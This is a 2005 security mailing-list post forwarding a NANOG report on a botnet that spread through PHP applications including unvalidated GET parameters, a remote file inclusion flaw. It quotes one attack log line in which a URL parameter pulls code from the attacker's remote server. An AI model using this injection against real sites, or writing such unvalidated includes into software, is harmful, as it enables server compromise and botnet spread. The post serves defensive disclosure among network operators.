[Dshield] [Fwd: Re:Destructive botnet originating from Japan]
cbrenton at chrisbrenton.org
Sat Dec 24 10:46:34 GMT 2005
And the follow up that includes the point of infection. This was covered
in the diary a few days ago.
-------- Forwarded Message --------
> From: Barrett G. Lyon <blyon at prolexic.com>
> To: nanog at merit.edu
> Subject: Re:Destructive botnet originating from Japan
> Date: Fri, 23 Dec 2005 16:20:00 -0800
> Well it appears that bad code always seems to be the root of
> problems, according to our research today the problem appears to be
> caused by incorrectly written PHP applications that perform includes
> using a string without running any validation against the string:
> When the include executes the test string passed from the GET
> includes execution instructions:
> "GET /index.php?test=http%3A//184.108.40.206/....? HTTP/1.0" 200
> 8010 "-" "Wget/1.6"
> It appears that the attacker at 220.127.116.11 (also the botnet hosting
> IRC server) is spreading his code as the include is called, pulling
> and executing PHP code from a remote server that injects the software.
> I'm not sure if this needs to be alerted to anyone outside of this
> list, but it's pretty nasty.
More information about the list